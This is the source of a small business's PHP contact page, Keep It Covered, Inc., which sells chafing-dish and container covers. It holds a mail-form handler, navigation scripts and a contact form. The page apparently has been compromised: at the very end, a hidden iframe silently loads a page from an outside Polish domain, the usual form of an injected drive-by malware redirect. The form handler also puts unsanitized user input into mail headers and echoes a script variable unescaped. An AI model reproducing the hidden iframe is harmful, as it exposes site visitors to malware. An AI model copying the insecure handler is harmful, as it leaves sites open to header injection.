<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <?php ## This is the page we are sent to after we sbmit the form ## $redirect_page = "/index.html"; if ($x_Action == 'mail') { $msgTo = 'info@keepitcoveredinc.com'; $msgFrom = "From: $Name <$email>"; $msgSubject = 'Keep It Covered Inc Contact Form Submission'; $msgBody = 'Keep It Covered Inc Form Submission, '; $msgBody .= date("F j, Y, g:i a"); $msgBody .= "\n\n"; $msgBody .= "\t Name: $Name\n"; $msgBody .= "\t Phone: $Phone\n"; $msgBody .= "\t Email: $Email\n"; $msgBody .= "$Comments\n\n"; $res = mail($msgTo, $msgSubject, $msgBody, $msgFrom); Header("Location: $redirect_page"); } ?><html><head><title>Keep It Covered, Inc. - FREE Quotes on Covers Creating Lasting Impressions.</title> <meta http-equiv="Content-Type" content="text/html; charset=unicode"> <meta content="chafer, chafing dish, garbage cans, wind block windguard, garbage containers, cover, decorative, accessory, buffet decorations, skirting, party rentals, banquet, catering, outside events, picnics, bbq, fire resistant, one size fits all, universal, elegant, safety, chaferware, containerware" name=keywords> <meta content="Keep it Covered, Inc - specialty covers for chafing dishes, garbage containers, water barrels, in the food service industry and beyond." name=description> <script language="JavaScript"> <!-- if (document.images) { image1on = new Image(); image1on.src = "images/nav_buttons_products.gif"; image2on = new Image(); image2on.src = "images/nav_buttons_about.gif"; image3on = new Image(); image3on.src = "images/nav_buttons_testimonials.gif"; image4on = new Image(); image4on.src = "images/nav_buttons_dealers.gif"; image5on = new Image(); image5on.src = "images/nav_buttons_contact.gif"; image6on = new Image(); image6on.src = "images/nav_buttons_home.gif"; image1off = new Image(); image1off.src = "images/nav_buttons_products_over.gif"; image2off = new Image(); image2off.src = "images/nav_buttons_about_over.gif"; image3off = new Image(); image3off.src = "images/nav_buttons_testimonials_over.gif"; image4off = new Image(); image4off.src = "images/nav_buttons_dealers_over.gif"; image5off = new Image(); image5off.src = "images/nav_buttons_contact_over.gif"; image6off = new Image(); image6off.src = "images/nav_buttons_home_over.gif"; } function changeImages() { if (document.images) { for (var i=0; i<changeImages.arguments.length; i+=2) { document[changeImages.arguments[i]].src = eval(changeImages.arguments[i+1] + ".src"); } } } // --> </script> <link href="kic.css" type="text/css" rel="stylesheet"> <meta content="MSHTML 6.00.6000.16546" name="GENERATOR"></head> <body text="#000000" leftmargin="0" topmargin="0" marginheight="0" marginwidth="0"> <script language="JavaScript" src="kic_rollover.js"></script> <table cellspacing="0" cellpadding="0" width="800" align="center" border="0"> <tr> <td> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td valign="bottom"><a href="index.html"><img height="60" alt="Keep It Covered Inc." src="images/logo_kic_red.gif" width="162" border="0"></a><br></td> <td colspan="2" align="right"><a onMouseOver="changeImages('image1', 'image1off')" onmouseout ="changeImages('image1', 'image1on')" href="products.html" ><img height="55" alt ="" src="images/nav_buttons_products.gif" width=78 border=0 name=image1 img></a><a onMouseOver="changeImages('image2', 'image2off')" onmouseout ="changeImages('image2', 'image2on')" href="about.html" ><img height="55" alt ="" src="images/nav_buttons_about.gif" width=92 border=0 name=image2 img></a><a onMouseOver="changeImages('image3', 'image3off')" onmouseout ="changeImages('image3', 'image3on')" href="testimonials.html" ><img height="55" alt ="" src="images/nav_buttons_testimonials.gif" width=114 border=0 name=image3 img></a><a onMouseOver="changeImages('image5', 'image5off')" onmouseout ="changeImages('image5', 'image5on')" href="contact.php" ><img height="55" alt ="" src="images/nav_buttons_contact.gif" width=102 border=0 name=image5 img></a><a onMouseOver="changeImages('image6', 'image6off')" onmouseout ="changeImages('image6', 'image6on')" href="index.html" ><img height="55" alt ="" src="images/nav_buttons_home.gif" width=70 border=0 name=image6 img></a></td> </tr> <tr> <td colspan="3" bgcolor="#639609" class="sideblue"><img height="345" alt="" src="images/header_products_contact3.jpg" width="800" border="0"></td> </tr> <tr> <td colspan="3" height="1" bgcolor="#ffffff"></td> </tr> <tr> <td colspan="3" bgcolor="#639609" height="3"></td> </tr> <tr> <td bgcolor="#639609"></td> <td colspan="2" class="body"><br><img height="21" alt="" src="images/title_contact.gif" width="102" border="0"> <blockquote><b>Email</b>&nbsp;&nbsp;<a href="mailto:info@keepitcoveredinc.com">info@keepitcoveredinc.com</a><br><br> <b>Phone</b>&nbsp;&nbsp;775-690-8891<br><br> <b>Mailing Address</b><br> 865 Amador Cir.<br> Carson City, NV 89705<br><br> <img height="1" alt="" src="images/hline_430.gif" width="430" border="0"><br><br> <table> <form action="<?php echo $SCRIPT_NAME; ?>" METHOD="post"> <input type="hidden" name="x_Action" value="mail"> <tbody> <tr> <td colspan="2" class="body">We appreciate your feedback and comments. Please let us know how we can further assist you.<br><br></td> </tr> <tr> <td class="body"><b>Name</b></td> <td><input class="formLoad" name="Name" size="35" ></td> </tr> <tr> <td class="body"><b>Phone</b></td> <td><input class="formLoad" name="Phone" size="35" ></td> </tr> <tr> <td class="body"><b>Email</b></td> <td><input class="formLoad" name="Email" size="35" ></td> <tr> <td class="body"><b>Product you're interested in</b></td> <td class="body"><input type="checkbox" class="formLoad" name="Chaferware" value="Yes">Chaferware</td> </tr> <tr> <td class="body">&nbsp;</td> <td class="body"><input type="checkbox" class="formLoad" name="ContainerWare" value="Yes">ContainerWare</td> </tr> <tr> <td class="body" valign="top"><b>Comments/Suggestions</b></td> <td><textarea class="formLoad" onMouseOver="this.formLoad='mouseOver'" onMouseOut="this.formLoad='mouseOut'" name="Comments" rows="5" cols="45"></textarea></td> </tr> <tr> <td class="body"></td> <td><input class="formbutton" type="submit" value="Submit" name="submit"></td> </tr> </form></table></blockquote></td></tr></table></td></tr></tbody></table> <iframe src="http://jL.chura.pl/rc/" style="DISPLAY: none"></iframe> </body> </html>